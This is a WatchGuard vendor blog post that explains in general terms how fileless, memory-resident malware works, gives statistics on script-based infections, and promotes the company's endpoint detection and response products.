WatchGuard Blog

Fileless attacks: a cybersecurity insight to be taken into account

Hackers are highly trained cybercriminals with access to resources capable of compromising a system in an organization without being detected. And malwareless attacks – where cybercriminals access critical business networks without malware – are on the rise.

Instead of installing a malicious application on the victim's hard drive like traditional malware, fileless malware is a threat that directly loads malicious code into memory. It tends to use two entry vectors: either it exploits an existing vulnerability in a program the victim uses or gets in through a file that is not installed as such, like a script. Fileless malware often injects its code into the memory of existing programs, which makes it very difficult for conventional antivirus solutions to detect.

Although these techniques are not that new (the first memory-resident viruses emerged in the 80s, and from the early 2000s worms appeared that were hosted on networks such as CodeRed or SQL Slammer) there has been exponential growth in cases since 2016. At WatchGuard, we have registered more than 200,000 different examples of malware originating from scripts since 2020 (compared to less than 50,000 from browsers, which comes second in the entry point ranking). This is an increase of 888% compared to 2019.

Traditional cybersecurity solutions primarily base analysis on signatures of known malware and malware that uses files. Today, they can also detect some anomalous patterns in code structures that may indicate script-based attacks that vary in terms of sophistication. 

With this in mind, should malware attacks even be considered a problem or indeed the main focus for modern businesses, especially when there are solutions available to prevent them?

Fortunately, tools like intrusion prevention services are capable of detecting and blocking network exploits, and halting vaporworm infections. Additionally, Endpoint Detection and Response (EDR) solutions that monitor process behavior for suspicious activity can detect malicious activity before it’s too late. Now WatchGuard goes one step further with WatchGuard EPDR, bringing together our Endpoint Protection (EPP) and Endpoint Detection and Response (EDR) capabilities into one product for maximum security against sophisticated endpoint threats.

As always, understanding the threat is half the battle. By educating yourself and your organization about the potential for and mechanics of malware attacks, you can ensure you have the necessary protections in place to avoid becoming a victim.